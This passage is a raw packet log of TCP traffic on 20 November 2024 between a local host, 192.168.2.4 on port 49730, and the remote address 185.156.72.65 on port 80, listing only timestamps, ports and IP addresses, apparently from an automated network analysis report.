                                                                Nov 20, 2024 05:02:20.840145111 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840159893 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840173960 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840173960 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840178013 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840188980 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840198994 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840199947 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840214014 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840224028 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840224981 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840234041 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840243101 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840245008 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840253115 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840264082 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840274096 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840276957 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840282917 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840293884 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840295076 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840303898 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840313911 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840320110 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840331078 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840338945 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840348005 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840358019 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840358973 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840374947 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840379953 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840395927 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840396881 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840408087 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840416908 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840420008 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840428114 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840437889 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840450048 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840459108 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840460062 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840470076 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840481043 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840482950 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840491056 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840502024 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840502977 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840513945 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840522051 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840524912 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840537071 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:20.840540886 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840560913 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:20.840610981 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.061892986 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.061944962 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.114296913 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.114440918 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119220018 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119230986 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119242907 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119282007 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119327068 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119465113 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119489908 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119505882 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119535923 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119535923 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119561911 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119563103 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119579077 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119595051 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119611025 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119626999 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119628906 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119628906 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119628906 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119643927 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119661093 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119668961 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119668961 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119682074 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119698048 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119698048 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119716883 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119724989 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119741917 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119755983 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119770050 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119785070 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119784117 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119784117 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119801998 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119806051 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119817019 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119834900 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119834900 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119837999 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119853973 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119873047 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119889975 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119891882 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119918108 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119929075 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119930029 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119941950 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119957924 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119963884 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119973898 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119990110 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.119992018 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.119992971 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120006084 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120012045 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.120022058 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.120033026 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122823000 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122839928 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122848988 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122848988 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122855902 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122869015 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122872114 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122888088 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122888088 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122903109 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122911930 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122911930 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122919083 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122931957 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122936010 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122951031 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122951984 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122968912 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.122977972 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122977972 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.122984886 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123002052 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123013020 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123013020 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123018026 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123033047 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123034954 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123051882 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123059988 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123059988 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123068094 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123080015 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123085022 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123100996 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123100042 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123117924 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123126984 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123126984 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123135090 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123147011 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123152018 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123167038 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123168945 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123186111 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123193979 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123193979 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123203039 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123213053 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123219013 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123230934 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123235941 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123250961 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123255014 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123270988 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123277903 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123277903 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123286009 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123302937 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123303890 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123303890 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123330116 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123339891 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123341084 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123347998 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123366117 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123379946 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123395920 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123405933 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123406887 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123406887 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123409986 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123426914 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123436928 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123445034 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123452902 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123461008 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123476982 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.123478889 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123497963 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123522997 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.123523951 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.341736078 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.341792107 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.400964022 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.401072979 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.405936956 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.405955076 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.405970097 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.405988932 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406048059 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406048059 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406109095 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406125069 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406140089 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406152010 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406156063 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406176090 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406181097 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406181097 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406193018 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406203032 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406208992 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406227112 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406227112 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406249046 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406256914 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406275034 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406289101 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406303883 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406306982 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406306982 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406320095 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406327009 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406337976 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406347990 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406371117 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406371117 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406378031 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406394005 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406408072 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406420946 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406423092 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406440020 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406449080 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406449080 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406459093 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406470060 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406475067 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406497955 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406497955 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406516075 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406527042 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406559944 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406574011 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406589031 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406603098 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406605005 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406603098 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406621933 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406627893 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406639099 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406655073 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406655073 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406677961 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406689882 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406713963 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406728983 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406732082 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406744957 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406749964 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406760931 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406775951 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406775951 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406780958 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406796932 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406801939 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406812906 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406816959 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406840086 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406860113 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406860113 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406877041 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406893015 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406900883 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406908989 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406922102 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406924963 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406948090 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406948090 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406969070 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.406972885 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.406985044 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.407000065 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.407015085 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.407018900 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.407020092 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.407030106 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.407047033 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.407047033 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.407047033 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.407062054 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.407066107 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.407083988 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.407102108 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.407109022 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.407131910 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.407147884 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.407162905 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.407174110 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.407174110 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.407179117 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.407196045 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.407202005 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.407212019 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.407228947 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.407229900 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.407229900 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.407255888 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.407274008 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.407280922 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.407295942 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.407324076 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.407334089 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.407334089 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.407341957 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.407356024 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.407358885 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.407380104 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.407397985 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.407398939 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.407426119 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.407440901 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.407448053 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.410147905 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.410149097 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.410149097 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.410180092 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.410180092 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.578093052 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.578207970 CET4973080192.168.2.4185.156.72.65
                                                                Nov 20, 2024 05:02:21.582916975 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.582933903 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.582948923 CET8049730185.156.72.65192.168.2.4
                                                                Nov 20, 2024 05:02:21.582990885 CET4973080192.168.2.4185.156.72.65
